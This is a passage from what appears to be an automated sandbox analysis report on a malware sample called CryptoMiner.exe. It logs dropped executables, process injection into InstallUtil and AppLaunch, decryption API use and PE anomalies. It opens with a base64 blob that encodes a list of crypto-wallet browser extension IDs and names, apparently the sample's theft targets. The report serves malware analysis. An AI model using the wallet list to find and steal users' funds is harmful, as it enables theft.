mhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
                    Source: filename.exe.12.dr, u206c???????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                    Source: 20.3.fname.exe.2f70000.0.unpack, u0002u2002.csCryptographic APIs: 'CreateDecryptor'
                    Source: 22.2.AppLaunch.exe.400000.0.unpack, u0002u2002.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: CryptoMiner.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: CryptoMiner.exeStatic file information: File size 1579064 > 1048576
                    Source: CryptoMiner.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x11f400
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: CryptoMiner.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: CryptoMiner.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\At8uAy02fG4K0d\a4ma7t7o\T3MNiT0siyfS.pdb source: CryptoMiner.exe
                    Source: Binary string: s.pdB source: filename.exe.12.dr
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D72808 pushad ; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D731DA push EF3FEFD4h; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D78956 push ebx; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D9D6A5 push ecx; ret
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D99635 push ecx; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06978220 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_0697D3EA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_0697F132 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06977FA0 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06979F5F pushfd ; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD8770 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CDA231 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD0E80 push eax; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CDA991 push es; ret
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE46433 push ebx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE47765 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE4770A push ecx; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF9EFE44FFD push eax; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA5E29 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: fname.exe.12.drStatic PE information: section name: JICeboQ
                    Source: fname.exe.12.drStatic PE information: section name: zcPlt
                    Source: fname.exe.12.drStatic PE information: section name: rrF5ta
                    Source: fname.exe.12.drStatic PE information: section name: IKbga
                    Source: fname.exe.12.drStatic PE information: section name: 03AAoc
                    Source: fname.exe.12.drStatic PE information: section name: 6maTqw
                    Source: fname.exe.12.drStatic PE information: section name: PKmYta
                    Source: fname.exe.12.drStatic PE information: section name: gTx1qw
                    Source: fname.exe.12.drStatic PE information: section name: 9YRtc
                    Source: initial sampleStatic PE information: section where entry point is pointing to: gTx1qw
                    Source: filename.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x4b37c4
                    Source: fname.exe.12.drStatic PE information: real checksum: 0x2ff should be: 0x388ceb
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.61191579951
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\filename.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\fname.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
